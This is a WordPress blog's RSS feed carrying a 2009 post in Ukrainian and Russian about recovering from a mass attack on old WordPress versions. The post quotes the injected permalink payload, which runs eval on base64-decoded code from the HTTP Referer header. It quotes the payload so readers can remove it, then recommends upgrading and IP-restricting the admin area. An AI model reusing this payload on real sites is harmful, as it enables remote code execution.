<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>hack wordpress &#8211; країна має талант</title>
	<atom:link href="https://lilumi.org.ua/tag/hack-wordpress/feed" rel="self" type="application/rss+xml" />
	<link>https://lilumi.org.ua</link>
	<description></description>
	<lastBuildDate>Wed, 15 May 2013 16:16:21 +0000</lastBuildDate>
	<language>uk</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.7.1</generator>
	<item>
		<title>Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!</title>
		<link>https://lilumi.org.ua/wordpress/defend-your-wordpress-blog-after-hack-attack</link>
		
		<dc:creator><![CDATA[lilumi]]></dc:creator>
		<pubDate>Sun, 06 Sep 2009 09:31:37 +0000</pubDate>
				<category><![CDATA[wordpress фішки]]></category>
		<category><![CDATA[hack wordpress]]></category>
		<category><![CDATA[htaccess]]></category>
		<category><![CDATA[захисти свій блог]]></category>
		<category><![CDATA[оптимізація wordpress'у]]></category>
		<guid isPermaLink="false">http://lilumi.org.ua/?p=656</guid>

					<description><![CDATA[[tab:Українською] Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів. Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання...]]></description>
										<content:encoded><![CDATA[<p>[tab:Українською]</p>
<p><a href="http://wordpress.org/support/topic/307518">Вчора</a> пройшла хвиля атаки і взлому блогів на вордпресі. А якщо <a href="http://tr.im/xYih">погуглити</a>, то можемо зробити висновок, що пострадали тисячі сайтів.</p>
<p><img fetchpriority="high" decoding="async" src="http://www.picamatic.com/show/2009/09/06/01/29/4981924_300x331.png" alt="захищаєм блог від хакерів" class="alignright" width="300" height="331" />Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.</p>
<p>І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: <a href="https://lilumi.org.ua/wordpress/wordpress-korisni-funkciyi-v-functionsphp">корисні функції в functions.php</a> — раджу і вам таке зробити ;)</p>
<p>А тим, хто вже пострадав від цього віруса, черв&#8217;яка, бота (називайте як хочете) потрібно зробити:</p>
<ul>
<li>В налаштуваннях ЧПУ, поміняти з<br />
<code>/%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</code><br />
на<br />
<code>/%postname%/</code><br />
(у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))</li>
<li>Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com</li>
<li>Оновити WordPress до версії 2.8.4</li>
</ul>
<p><span id="more-656"></span></p>
<p>Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess<br />
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон<br />
Для цього зробіть наступне:</p>
<ul>
<li>зайдіть на сайт <a href="http://myip.ru">myip.ru</a> аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173</li>
<li>створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
<pre><code>AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
allow from 91.134.98.173
</LIMIT></code></pre>
<p>а якщо у вас динамічна айпішка, то краще напишіть так: </p>
<pre><code>
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
allow from 91.134.0.0/255.255.0.0
</LIMIT></code></pre>
<p>Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте <a href="http://httpd.apache.org/docs/1.3/mod/mod_access.html#allow">тут</a>.</li>
<li>Збережіть файл. Все.</li>
</ul>
<p>Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп&#8217;ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «<em>Це що, я ще й маю пароль на фтп пам&#8217;ятати для таких випадків?</em>» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»</p>
<p>Бережіть себе і бережіть свій блог.</p>
<p>[tab:По русски]</p>
<p><a href="http://wordpress.org/support/topic/307518">Вчера</a> прошла волна атаки и взлома блогов на вордпрессе. И если <a href="http://tr.im/xYih">погуглить</a>, то можно судить, что пострадали тысячи блогов.</p>
<p>Но как все это произошло? А случилось вот что: кое-кто запустил в сеть бота, который находил старые версии WordPress (до версии 2.8.4) и пользуясь старым багом, регистрировал юзера и используя определенную ссылку получал права админа на блоге, потом под этим юзером менял шаблон ЧПУ в настройках, а далее модифицировал (заражал) код темы.</p>
<p>И хотя мой блог до сих пор работает на одной из старых версий вордпресса, но не пострадал. А все потому, что бот определял версию блога по мета-тегу, который автоматически прописывает вордпресс во все темы, а я этот тег давным-давно у себя удалил. Про то, как удалить этот тег, я писал ранее в статье: <a href="https://lilumi.org.ua/wordpress/wordpress-korisni-funkciyi-v-functionsphp">корисні функції в functions.php</a> — советую и вам так же сделать ;)</p>
<p>А тем, кто уже пострадал от этого вируса, червья, бота (называйте как хотите) нужно:</p>
<ul>
<li>В настройках ЧПУ, поменять с<br />
<code>/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</code><br />
на<br />
<code>/%postname%/</code><br />
(у вас может отличаться структура, по аналогии думаю поймете, что где поменять :))</li>
<li>Найдите последнего  зарегистрированного пользователя на вашем сайте и уничтожьте его! Скорее всего , это будет MikeWink E-mail: bugbeemershonyhe@gmail.com</li>
<li>Обновите WordPress до версии 2.8.4</li>
</ul>
<p>А если нет желания обновляться и хотите улучшить безопасность своего блога, то вы можете запретить всем доступ к админке, кроме себя, с помощю небольшой правки .htaccess<br />
Конечно, было бы лучше, если у вас постоянный статический IP-адрес, тогда тольки бы его и указывали. Но в случае динамического айпи-адреса можете указывать диапазон адресов.<br />
Для это сделайте следующее:</p>
<ul>
<li>зайдите на сайт <a href="http://myip.ru">myip.ru</a> чтобы узнать ваш IP адрес. К примеру: ВАШ IP-АДРЕС: 91.134.98.173</li>
<li>создайте файл .htaccess в папке wp-admin вашего блога и пропишите там следующее:
<pre><code>AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
allow from 91.134.98.173
</LIMIT></code></pre>
<p>в случае динамического IP-адреса, напишите так: </p>
<pre><code>
AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
allow from 91.134.0.0/255.255.0.0
</LIMIT></code></pre>
<p>Подробнее о синтаксисе директив Allow, Deny для Apache htaccess читайте <a href="http://httpd.apache.org/docs/1.3/mod/mod_access.html#allow">здесь</a>.</li>
<li>Сохраните файл. Все.</li>
</ul>
<p>Теперь, к админке вашего блога зайти можете только вы с вашого компьютера. Ну а если вы будете в дороге, или в интернет-кафе и захотите, зайти в админку блога, а вас не будет пускать (скорей всего, вы увидите сообщение об ошибке 404), потому что IP-адрес не входит в указанный диапазон, то тогда вам нужно будет зайти по фтп на хостинг и <strong>временно</strong> переименовать файл .htaccess. И тут, наверное, кто-то из вас подумал: «<em>Это я еще должен и пароль на фтп помнить для таких случаев?</em>» — Ну а что вы хотели, приходится жертвовать удобством ради безопасности. Помните цитату: «Так вам шашечки или ехать?!»</p>
<p>Берегите себя и берегите свой блог.</p>
<p>[tab:END]</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
